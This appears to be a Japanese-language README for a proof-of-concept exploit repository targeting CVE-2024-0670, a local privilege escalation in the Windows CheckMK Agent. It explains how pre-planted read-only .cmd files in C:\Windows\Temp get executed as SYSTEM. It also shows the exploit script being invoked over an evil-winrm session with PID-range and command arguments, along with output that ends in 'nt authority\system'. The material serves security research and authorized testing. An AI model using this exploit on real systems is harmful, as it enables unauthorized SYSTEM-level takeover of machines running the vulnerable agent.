
このリポジトリは、CVE-2024-0670 脆弱性のProof of Concept (PoC) エクスプロイトを提供します。この脆弱性は、Windowsシステム上のCheckMK Agentに影響を与えます。脆弱性は、CheckMK Agentが C:\Windows\Temp ディレクトリに一時ファイルを作成し実行する際に発生します。攻撃者は、書き込み保護を設定した悪意のあるファイルをそのディレクトリに事前に配置することで、この動作を悪用できます。エージェントが読み取り専用として既に存在する一時ファイルを作成しようとすると、上書きに失敗しますが、既存のファイルをSYSTEM権限で実行し、権限昇格を可能にします。
アドバイザリ参照: SEC Consult - Checkmk Agentの書き込み可能ファイルを介したローカル権限昇格
このプロジェクトは教育、研究、および許可されたセキュリティテスト目的のみを意図しています。
自身が所有していない、またはテストの明示的な許可がないシステムではこのコードを使用しないでください。
著者は、いかなる損害や誤用についても責任を負いません。
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
[+] Searching for Check MK installer...
[+] Found: C:\Windows\Installer\1e6f2.msi
[+] Using command: whoami > C:\Windows\Temp\whoami.txt
[+] Preparing 18000 .cmd files...
[*] Progress: 0%
[*] Progress: 10%
[*] Progress: 20%
[*] Progress: 30%
[*] Progress: 40%
[*] Progress: 50%
[*] Progress: 60%
[*] Progress: 70%
[*] Progress: 80%
[*] Progress: 90%
[*] Progress: 100%
[+] Triggering MSI to execute command...
[+] Done
evil-winrm-py PS C:\Users\magicrc\Desktop> cat C:\Windows\Temp\whoami.txt
nt authority\system